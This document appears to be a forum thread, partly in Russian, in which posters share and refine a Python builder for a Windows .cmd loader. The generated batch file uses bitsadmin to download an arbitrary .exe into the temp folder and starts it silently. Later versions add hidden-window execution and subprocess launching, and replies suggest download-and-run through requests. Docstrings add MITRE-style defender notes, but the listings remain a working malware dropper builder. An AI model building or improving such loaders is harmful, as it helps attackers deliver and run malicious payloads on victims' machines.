
[Script] .cmd loader

Python:
import random
import string
import os

def loader(link, script):
    """Build the text of a Windows batch downloader plus a random name for it.

    Returns a ``(file_name, batch_text)`` tuple. Nothing is written to disk or
    executed by this function.

    ``link`` and ``script`` are interpolated verbatim into the batch text, so
    the download URL and the target file name are readable in clear text in
    any recovered .cmd artifact.

    Defender notes on the generated batch file:
    - It calls ``bitsadmin /transfer`` with the fixed job name "mdj" and
      ``/download /priority FOREGROUND`` (MITRE ATT&CK T1197 BITS Jobs,
      T1105 Ingress Tool Transfer). cmd.exe expands the variables before the
      call, so the URL appears on the bitsadmin.exe command line in process
      creation logs.
    - The downloaded file is placed in the user's temp directory and started
      with ``start /B`` with stdout/stderr discarded (T1059.003). A process
      image under the temp directory whose parent is cmd.exe running a .cmd
      file is the follow-on signal.
    """
    # 12 random letters/digits: the .cmd file name differs on every build, so
    # it is not a usable indicator; match on the file content instead.
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

# Builder side: prompts for the URL and file name that are embedded verbatim
# in the generated batch text.
link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
# Rebinds `cmd` and `loader`: from here on `loader` is the batch text, not
# the function.
cmd, loader = loader(link, script)

# The batch file is written to the current working directory. This listing
# only produces the file; it does not execute it.
with open(cmd, "w") as f:
    f.write(loader)

print(f"{cmd} saved to folder!!!")
 
A more descriptive and definitive version of the source above.
Python:
import random
import string
import os
import requests
import argparse

# A function that generates a random string of characters for naming the .cmd file
def random_string(length):
    """Return ``length`` characters drawn from ASCII letters and digits.

    Uses ``random.choices``, i.e. the non-cryptographic module-level PRNG.
    In this listing the result is only used as a file name, so the name of
    the generated .cmd file changes on every run and is not a stable
    indicator for detection.
    """
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

# A function that downloads a file from a given URL and saves it to a specified path
def download_file(url, save_path):
    """Stream the body of ``url`` into the file at ``save_path``.

    The response is read in 8192-byte chunks and written in binary mode.
    ``raise_for_status()`` raises for 4xx/5xx responses before any file is
    opened. The content is stored as received; nothing here inspects or
    verifies it.
    """
    # Send a GET request to the URL to download the file
    response = requests.get(url, stream=True)
    # Raise an exception if the status code of the response is not successful
    response.raise_for_status()
    # Open a file to write the downloaded content
    with open(save_path, 'wb') as f:
        # Iterate over the content of the response and write it to the file
        for chunk in response.iter_content(chunk_size=8192):
            if chunk:
                f.write(chunk)

# A function that generates a loader script for a given file URL and name
def generate_loader(link, script):
    """Build the text of a Windows batch downloader plus a random name for it.

    Returns a ``(file_name, batch_text)`` tuple; nothing is written or run
    here. ``link`` and ``script`` are placed verbatim in the batch text, so
    the URL and target file name can be read directly from a recovered .cmd
    file.

    Defender notes on the generated batch file:
    - ``bitsadmin /transfer "mdj" /download /priority FOREGROUND`` is the
      download step (MITRE ATT&CK T1197 BITS Jobs, T1105 Ingress Tool
      Transfer); the job name "mdj" is constant across builds.
    - The file is saved under the user's temp directory and launched with
      ``start /B`` with output discarded (T1059.003), so the chain to look
      for is cmd.exe -> bitsadmin.exe followed by cmd.exe starting an image
      from the temp directory.
    """
    # Generate a random string to name the .cmd file
    random_name = random_string(12)
    # Create the loader script using the file URL and name
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return f"{random_name}.cmd", loader

# Define command line arguments for the script
# NOTE(review): the description says "Download and run", but nothing in this
# listing executes either the downloaded file or the generated .cmd.
parser = argparse.ArgumentParser(description='Download and run a remote executable file.')
parser.add_argument('url', type=str, help='The direct download link to the .exe file')
parser.add_argument('name', type=str, help='The exact name of the .exe file on the download link')

# Parse the command line arguments
args = parser.parse_args()

# Generate a loader script for the file and save it to a .cmd file
# The .cmd file is written to the current working directory.
cmd_file, loader_script = generate_loader(args.url, args.name)
with open(cmd_file, "w") as f:
    f.write(loader_script)

# Download the file from the given URL and save it to the user's Downloads folder
# This is a second, separate fetch made by the Python process itself; the
# batch file performs its own download via bitsadmin when it is run.
file_path = os.path.join(os.path.expanduser("~"), "Downloads", args.name)
download_file(args.url, file_path)

# Print a message to the user indicating that the script and file have been downloaded successfully
print(f"{cmd_file} saved to folder!!!")
print(f"{args.name} downloaded and saved to {file_path}")
 
Python:
# Fragment: `os`, `args`, `download_file`, `subprocess` and `cmd_file` are
# not defined in this snippet and must come from the surrounding script.

# Download the file from the given URL and save it to the user's Downloads folder
file_path = os.path.join(os.path.expanduser("~"), "Downloads", args.name)
download_file(args.url, file_path)

# Hide the terminal window when running the .cmd file
# STARTF_USESHOWWINDOW tells Windows to honour the wShowWindow field, which
# is left at its default here.
# Defender note: window visibility does not affect process creation
# telemetry (e.g. Sysmon Event ID 1, Security Event ID 4688); the child
# command line is still recorded.
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW

# Run the .cmd file and wait for it to complete
subprocess.call([cmd_file], startupinfo=startupinfo)


Add this source part for a NO show window flag.
 
Python:
import random
import string
import os

def loader(link, script):
    """Return ``(file_name, batch_text)`` for a Windows batch downloader.

    The function only builds strings. ``link`` and ``script`` are embedded
    unchanged in the batch text, so both are visible in clear text in the
    resulting .cmd file.

    Defender notes: the batch text downloads with ``bitsadmin /transfer``
    under the constant job name "mdj" (MITRE ATT&CK T1197, T1105), saves to
    the user's temp directory and starts the file with ``start /B`` with
    output discarded (T1059.003). Command-line logging of bitsadmin.exe and
    of processes started from the temp directory covers both steps.
    """
    # Random 12-character name: differs per build, so detection should key on
    # the batch content rather than on the file name.
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

# Interactive builder: the two answers are embedded as-is in the batch text.
link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
# After this assignment `loader` refers to the batch text, shadowing the
# function of the same name.
cmd, loader = loader(link, script)

# Writes the batch file into the current working directory; this listing
# does not run it.
with open(cmd, "w") as f:
    f.write(loader)

print(f"{cmd} saved to folder!!!")

Python:
import random
import string
import subprocess

def loader(link, script):
    """Return ``(file_name, batch_text)`` for a Windows batch downloader.

    Pure string construction: no file is written and nothing is executed in
    this function. ``link`` and ``script`` go into the batch text unchanged,
    which means a recovered .cmd file exposes the download URL and the
    dropped file name directly.

    Defender notes: the download step is ``bitsadmin /transfer "mdj"
    /download /priority FOREGROUND`` (MITRE ATT&CK T1197 BITS Jobs, T1105
    Ingress Tool Transfer) and the launch step is ``start /B`` on a file in
    the user's temp directory with output redirected to nul (T1059.003).
    """
    # The 12-character random name changes per build; it is not an indicator.
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

# Interactive prompts; both values are embedded in the generated batch text.
link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
# Input checks are a prefix test on the URL and a suffix test on the name;
# either failure aborts with ValueError before anything is written.
if not link.startswith("http"):
    raise ValueError("Invalid URL entered.")
if not script.endswith(".exe"):
    raise ValueError("Invalid file name entered.")
# Rebinds `cmd` and `loader`; `loader` is the batch text from here on.
cmd, loader = loader(link, script)

# The batch file is written to the current working directory.
with open(cmd, "w") as f:
    f.write(loader)

# This variant also runs the generated batch file on the local machine.
# Defender note: in process telemetry this would presumably appear as the
# Python interpreter spawning cmd.exe for a randomly named .cmd file,
# followed by bitsadmin.exe - confirm against real telemetry.
try:
    subprocess.run([cmd], check=True)
except subprocess.CalledProcessError as e:
    # Only a non-zero exit status of the child is handled here.
    print(f"Command failed with exit code {e.returncode}.")
else:
    print(f"{cmd} saved to folder!!!")

В обновленной версии я добавил проверку ввода для URL и имени файла, создал исключения для недопустимого ввода и использовал модуль подпроцесса для выполнения команды с обработкой ошибок.
 
Python:
import random
import string
import subprocess

def loader(link, script):
    """Return ``(file_name, batch_text)`` for a Windows batch downloader.

    Only strings are built here. Because ``link`` and ``script`` are inserted
    unchanged, the URL and dropped file name can be read straight from the
    generated .cmd file during triage.

    Defender notes: look for ``bitsadmin /transfer`` with the constant job
    name "mdj" (MITRE ATT&CK T1197, T1105) and for cmd.exe starting an image
    from the user's temp directory via ``start /B`` (T1059.003).
    """
    # Per-build random file name; key detections on content, not on the name.
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

# Interactive prompts; the answers are placed verbatim in the batch text.
link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
# A prefix test on the URL and a suffix test on the file name; a failed test
# raises ValueError and nothing is written.
if not link.startswith("http"):
    raise ValueError("Invalid URL entered.")
if not script.endswith(".exe"):
    raise ValueError("Invalid file name entered.")
# `loader` is rebound to the batch text by this assignment.
cmd, loader = loader(link, script)

# Batch file goes into the current working directory.
with open(cmd, "w") as f:
    f.write(loader)

# The generated batch file is executed locally by this variant.
# Defender note: process creation logging records the child command line, so
# the interpreter -> cmd.exe -> bitsadmin.exe sequence is the thing to hunt
# for (exact tree to be confirmed against real telemetry).
try:
    subprocess.run([cmd], check=True)
except subprocess.CalledProcessError as e:
    # Handles only a non-zero exit status from the child process.
    print(f"Command failed with exit code {e.returncode}.")
else:
    print(f"{cmd} saved to folder!!!")

В обновленной версии я добавил проверку ввода для URL и имени файла, создал исключения для недопустимого ввода и использовал модуль подпроцесса для выполнения команды с обработкой ошибок.
Мне кажется проверка на endswith(.exe) лучше убрать, файл может отдаваться с сайта и кастомным линком.
А так я бы добавил скачку по http/https с помощью requests + запуск файла с помощью system / subprocess.
 
Мне кажется проверка на endswith(.exe) лучше убрать, файл может отдаваться с сайта и кастомным линком.
А так я бы добавил скачку по http/https с помощью requests + запуск файла с помощью system / subprocess.
Feel free to add those suggestions to the script
 

